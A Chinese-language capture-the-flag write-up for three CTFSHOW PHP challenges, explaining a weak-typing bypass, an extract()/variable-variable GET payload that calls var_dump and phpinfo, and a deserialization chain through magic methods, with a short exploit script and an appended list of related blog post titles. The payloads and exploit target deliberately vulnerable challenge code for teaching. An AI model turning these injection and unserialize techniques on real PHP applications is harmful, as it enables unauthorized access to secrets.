CTFSHOW 年CTF

1.除夕

php的弱类型,用小数点绕过 这里后面直接加字母不行

2.初三

复制代码
error_reporting(0);
extract($_GET);
include "flag.php";
highlight_file(__FILE__);

这里通过extract将get的参数导入为了变量

复制代码
$_=function($__,$___){
    return $__==$___?$___:$__;
};

这里通过了

_是这个函数的变量 __ $___是函数接收到的参数

通过三元运算 即 __ == ___ 来比较参数是不是相同,相同返回__ ,不相同返回___

复制代码
$$__($_($_GET{
    $___
}[$____]{
    $_____
}(),$flag));


$$__($_($_GET{$___}[$____]{$_____}(),$flag));

这里__和后面的分开来看,$_就是上面的自定义函数,这里我们分析函数是没有输出能力的,所以__就是var_dump用于输出后面的内容,回到函数 传入的第一个参数__就是GET{___}\[]{_____}()第二个参数就是flag,回到上面的函数中,我们要输出flag 就是输出,在上面的三元运算中知道,__和一样就会返回___所以我们构造GET{___}\[]{_____}()为flag 或者为true

这里配合extract我们就可以传入$的参数为var_dump 即 /?=a&a=var_dump

因为还有()所以是个无参函数,

复制代码
<?php
phpinfo() == 'zx';
//bool(true)

弱类型中phpinfo()是true这里使用phpinfo

这里的

复制代码
$_GET{$___}[$____]{$_____}

这里的三个___ ____ _____都是通过_get获取的,这里也是个三维数组,其中第一维的键名为,第二维为____,第三维为__我们可以传入类似/?=b&_=c&_____=d的get请求,这个就是一个三维数组$_GET'b''c''d',所以我们构造'b''c''d'=phpinfo,最后我们再传入xbc=phpinfo,就完成了三维数组的构造

?=a&a=var_dump&=b&___=c&_____=d&bcd=phpinfo

3.初六

复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-01-18 08:46:07
# @Last Modified by:   h1xa
# @Last Modified time: 2023-01-18 11:19:09
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

include "flag.php";

class happy2year{

    private $secret;
    private $key;

    function __wakeup(){
        $this->secret="";
    }
    
    function __call($method,$argv){
        
        return call_user_func($this->key, array($method,$argv));
    }


    function getSecret($key){
        $key=$key?$key:$this->key;
        return $this->createSecret($key);    
    }


    function createSecret($key){
        return base64_encode($this->key.$this->secret);
    }

    function __get($arg){
        global $flag;
        $arg="get".$arg;
        $this->$arg = $flag;
        return $this->secret;
    }

    function __set($arg,$argv){
        $this->secret=base64_encode($arg.$argv);
        
    }

    function __invoke(){
        
        return $this->$secret;
    }
    

    function __toString(){
    
        return base64_encode($this->secret().$this->secret);
    }

    
    function __destruct(){
        
        $this->secret = "";
    }
    


}

highlight_file(__FILE__);
error_reporting(0);
$data=$_POST['data'];
$key = $_POST['key'];
$obj = unserialize($data);
if($obj){
    $secret = $obj->getSecret($key);
    print("你提交的key是".$key."\n生成的secret是".$secret);

highlight_file(__FILE__);
error_reporting(0);
$data=$_POST['data'];
$key = $_POST['key'];
$obj = unserialize($data);
if($obj){
    $secret = $obj->getSecret($key);
    print("你提交的key是".$key."\n生成的secret是".$secret);

通过这一段我们知道反序列化后先回调用getSecret而在happy2year中

复制代码
 function createSecret($key){
        return base64_encode($this->key.$this->secret);
    }

这里把两个变量进行了拼接,也就是把对象当作了字符串会触发tostring

复制代码
  function __toString(){
    
        return base64_encode($this->secret().$this->secret);
    }

里面调用了secret方法而不存在这个方法所以回触发call

复制代码
    function __call($method,$argv){
        
        return call_user_func($this->key, array($method,$argv));
    }

通过key = _POST'key';我们找到了可以构造的参数key

在回调函数中第一个是函数 也就是这里的$this_key被当成了函数执行回调用invoke

复制代码
function __invoke(){
        
        return $this->$secret;
    }

调用了this-\>secret 但是secret是私有属性触发get

复制代码
 function __get($arg){
        global $flag;
        $arg="get".$arg;
        $this->$arg = $flag;
        return $this->secret;
    }

get中arg=get 拼接 arg 而get(arg)他接收的就是secret 也就是arg='getsecret'

然后this-\>arg=$flag

给一个未定义的属性赋值时,触发__set

复制代码
 function __set($arg,$argv){
        $this->secret=base64_encode($arg.$argv);
        
    }

set中接收arg argv arg就是getsecret argv就是接收的数据flag

这样.sercrt里面就有了flag

复制代码
exp
<?php
class happy2year{
	private $secret;
    private $key;
	function __construct(){
                $this->key=$this;
        }

}
$a=new happy2year();
echo urlencode(serialize($a));

?>

三次base解码得到flag

相关推荐
vortex515 分钟前
AI Skill 设计:网络安全审计中的自主性与规范化博弈
人工智能·安全·web安全
zhangfeng11331 小时前
那nvidia orim车载gpu tee安全飞地 和天垓 100 gpgpu的 飞地 ,大概有多大存储量 ,解密流程
人工智能·深度学习·安全·语言模型·gpu算力·芯片
吹个口哨写代码2 小时前
前后端分离的安全补救措施
安全
zhangfeng11333 小时前
天数智芯天垓 100 加密大模型分布式部署安全方案
人工智能·分布式·安全·transformer·gpu算力·芯片
@insist1233 小时前
系统架构设计师-安全架构设计:网络安全威胁分类与典型攻击原理
web安全·系统架构·软考·安全架构·系统架构设计师·软件水平考试
workflower3 小时前
医院核心竞争力的四大重构
人工智能·安全·设计模式·重构·动态规划·scrum
zhangfeng11333 小时前
车载gpu 飞地 只保存密钥 不保存 权重 Orin确实有TEE安全飞地(TSEC/OP-TEE)
服务器·网络·人工智能·安全·transformer·芯片
humors2214 小时前
四种字母密码表示法
安全·网络安全·密码学
暗夜猎手-大魔王5 小时前
转载--Hermes Agent 11 | 智能审批与平台化安全:当 AI 来守护 AI
人工智能·python·安全
2603_954708316 小时前
微电网协调控制系统柜的应用场景有哪些?
分布式·安全·架构·能源·需求分析